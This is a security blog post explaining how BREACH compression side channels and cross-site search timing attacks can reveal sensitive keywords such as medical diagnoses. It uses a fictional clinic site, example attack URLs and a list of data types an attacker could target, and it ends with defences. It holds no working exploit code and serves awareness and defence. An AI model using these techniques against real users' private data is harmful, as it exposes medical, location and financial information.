Wednesday, December 23, 2015

I challenge you to compute this: Specializing BREACH and Cross-Site Search attacks to steal private keywords

In the real world there are many cases when we are more interested in how well a system protects a few specific keywords, rather than how well it can secure data “in a broader sense”. If an attacker can learn those keywords (say medical history/diagnosis), then the system’s security fails from the perspective of the user.

In this article I will try to raise awareness of two side channel attacks that are often practical in stealing such strings. Specifically, I want to emphasize how these two known attacks can be used against websites to exfiltrate private information about a user by associating the protected data with a set of sensitive strings, such as from a domain specific dictionary.

The question that I want you to keep in the back of your mind when reading this article is: As an engineer, what kind of data am I actually protecting? Is the data I’m protecting a sensitive set of words from a small corpus, and how do I deal with the fact that the data I’m protecting is “low entropy”?

As an attacker, can I learn something sensitive even without decrypting your TLS channel, circumventing the same-origin policy, or by taking over your account? Everyone likes to steal session tokens, but do I really have to, to get the user data? Can’t I just throw my sensitive keyword at the target and see if it sticks?

A Contrived Example To Get Started: Payload length

Say that your doctor office launch a website, https://getmydiagnosis.foo (to the horror of the security and privacy community). After logging in you are presented with a /diagnosis endpoint which, due to this being an early beta, will print one of the following two strings to the user:

“You are healthy!”
“You have cancer! Here’s some information about that…”

What do I do as an attacker sniffing your connection? I look at the TLS length fields or TCP packet lengths. The data is very well encrypted, but because the content that is encrypted is only one of two options I can use some other information (packet lengths) to figure out what is encrypted. I have learned the plaintext even without decrypting it.

The important point in this silly example is as follows: what we really want to protect here is the keywords “healthy” and “cancer” (or even just the binary predicate of the presence of one of those). The description text is often not really important at all from a privacy perspective.

About BREACH: A compression side channel

Let us take a less contrived example. Go to any popular website and look at the HTTP traffic. You are likely to find that the payload, be it HTML or JSON or XML, is compressed.

Content-Encoding: gzip

The whole idea of compression is to make the output data “shorter” in a sense. The string "hello world, the world says hello!" will intuitively compress better than a string of random characters, because of the re-use of the substrings “hello” and “world”. If I as an attacker can inject a string that will be reflected in a payload that is then compressed, then I can exfiltrate some private data by trial, error and observation.

Let us look at the doctor example again. This time the website is out of beta and is capable of listing all possible health issues, not just two options. Once logged in you are taken to the following page that unfortunately tells you that you have cancer and that you should contact your doctor's office for more information.

https://getmydiagnosis.foo/diagnosis?office=Stockholm
.. Cancer .. Stockholm


The payload is compressed and sent over TLS. For the sake of this example the query parameter “office” is reflected in the payload, whereas the rest of the data is not (say it’s pulled from a database). If I can make the target I’m attacking visit the specially crafted page:

https://getmydiagnosis.foo/diagnosis?office=Cancer
.. Cancer .. Cancer


Then the payload will compress slightly better if the diagnosis (the static content) is Cancer compared to strings not in the static content. Armed with a dictionary of diseases, I want to force the target to visit all these pages and record how well the data compress, by looking at packet lengths:

https://getmydiagnosis.foo/diagnosis?office=Flu
.. Cancer .. Flu
https://getmydiagnosis.foo/diagnosis?office=Mononucleosis
.. Cancer .. Mononucleosis
https://getmydiagnosis.foo/diagnosis?office=Cancer
.. Cancer .. Cancer


Doing this, I can maybe learn your diagnosis.

How do I make the target visit those specially crafted pages? For one, if you can inject data in a WiFi network, just look after a non-https traffic (the target may have many tabs open for example) and inject something like

<script src="https://...">

Which often works, especially if the website lack CSRF protection. You can also trick the user into visiting your website that does the above.

This class of attacks works better the less noisy the target endpoint is. JSON xhr endpoints that reflect input via a GET query parameter are often very nice to attack as they are much less noisy than if data is embedded directly into a large HTML payload.

Let's take a step back here and think about what the above attack means:

If I as an attacker have domain knowledge about what the plaintext can be, and the plaintext can be from a limited set of strings, I can quite easily (in some cases) learn your information without decrypting the TLS channel.

About Cross Site Search attacks: A timing side channel

A consequence of the BREACH attack is that it only works in practice if I can record packet lengths. That is how I learn if the injected data compress well or not.

A similar side channel attack that works in many cases is to do a cross site request to instruct a browser to make search queries on the target website, and record the timing. The purpose is, of course, to to find keywords for a user when the target website has a per-user search function. Results with words that are in the search index will often return with different timings than when the words are not indexed, depending on how the search result is constructed. This can be due to server-side processing, caching, database lookups done on the search results etc.

As a concrete example, if I search in GMail for a random string, that will typically return in about 0.3 seconds. If however I search for a string that is in my index, it will take significantly longer (0.6 seconds or more) due to GMail fetching the individual results server side and constructing the response.

Quite often, a search function on a website is non-mutating GET request, so it may not have CSRF protection.

Going back to the doctor website example, say that I can search my journal for medical history. Armed with the same dictionary as I used in the BREACH attack, I just construct a special website that asynchronously visits the below endpoints, and records the timing it takes for the page to load.

https://getmydiagnosis.foo/searchmedicalhistory?query=...

I no longer need to be in the middle to learn interesting data, I just have to trick the target into visiting my attack website, and record how long the “challenge” searches take compared to a known hit or miss. Often a fairly simple statistical model is needed to learn the search output, depending on how big the search space you are interested in is.

This attack can also be fairly advanced if done correctly, even constructing whole keywords from parts. Amir Herzberg and Nethanel Gelernter [1] successfully used this timing attack against GMail to figure out the name of the account holder, by a special divide and conquer search approach that is faster than just trying names in a dictionary one by one. Their paper offer many super cool techniques to make this kind of attack very practical.

I won’t spoil the paper for you but I just want to mention one technique that I believe is awesome: By short circuiting challenge search queries, you can often trick a search engine to perform some very time consuming work if the first search keyword is not found. That will aid your data gathering.

The concern with XS (Cross Search) is the same as for BREACH: Relatively few queries are needed to learn the presence of a single keyword from a dictionary (more advanced searches may require more queries and a better model).

Sensitive Data Everywhere!

There are many places on the Internet where the content being protected is from a small set of strings, and those places can sometimes be attacked using these techniques, with a relatively small set of queries.

Before writing this article I, by cheating a little bit, used the compression attack against Google Location History. It reflects query parameters in the payload and it does contain the countries/places you have visited, which lends itself nice to this kind of “dictionary” attack. Note that in practice this is difficult to do against Google Location History because the compressed payload is very noisy, so both myself and Google Security Team consider this attack against them to be more on the academic than practical side. If Location History was less noisy, the attack may have worked in practice.

Of course, I am fairly certain that the general class of attack can be successfully mounted against other targets. Consider for example:
  • Medical data requires a small dictionary of diseases.
  • Search history requires a small dictionary of sensitive keywords that are interesting to the attacker.
  • Communication/chat data requires a small dictionary of common first/last names to enumerate contact information.
  • Location history data requires a small dictionary of the place names in the world (countries, cities etc).
  • Financial data requires a small dictionary of, for example, names (money transfer recipients), company names (stock investments), numbers (credit card numbers, salary data) etc.
  • … and others. A particularly scary case is if the information you are after is a simple predicate, or a set of very small options.
If you can exploit search functionality, then that is typically a very viable approach as you don’t need to be in the middle of the TLS connection. If not, be the man in the middle and look for a compressed endpoint, with a normally small/clean output, where you can inject the challenge string you are looking for.

Protective Measures

Search fields can be enhanced with CSRF protection. There may be other places that are “search like” that will also leak timing data. It can be fun and terrifying to ask what other GET queries may leak significant timing data.

BREACH can be avoided by not compressing sensitive output. Here the best bang for the buck would be to disable compression on endpoints that reflect query parameters or (especially) have a small output size (because it’s typically less noisy and thus easier to compromise than the larger payloads).

Rate limiting can sometimes help, if the search space is large enough that a significant number of queries is required to exhaust the dictionary. Of course, even a strict rate limiting can not protect content where the set of possibilities is very small.

A noisy output can help against BREACH by obscurity, by design, or by accident. A very ugly workaround that may increase the cost of the attack in some cases could be to introduce a random byte string in the payload that has a random length. Invoking information theory the fact that the string is random makes it generally not compress, so by also making the “token” random length will result in the output getting a jittered length as well. This will often not work though, for two reasons. First of all, the compression algorithm may break this band-aid in various ways; window sizes/lookback and compression contexts may make your random string not affect the compression. Secondly, it may be possible to differentiate between a hit (that compress) and a miss anyway, by doing enough requests.

Conclusion

Hopefully this article will raise awareness of these side channel attacks and how they can be of particular concern to systems that are meant to protect a small set of keywords.

In general, a useful question to ask when designing secure systems is this: What is the most important data I am protecting, and how large is the domain?

Thanks to my friends Gunnar Kreitz, Nenad Stojanovski and Alex Rad for valued feedback on this post. Any mistakes are solely my own.

[1] http://dl.acm.org/citation.cfm?id=2813688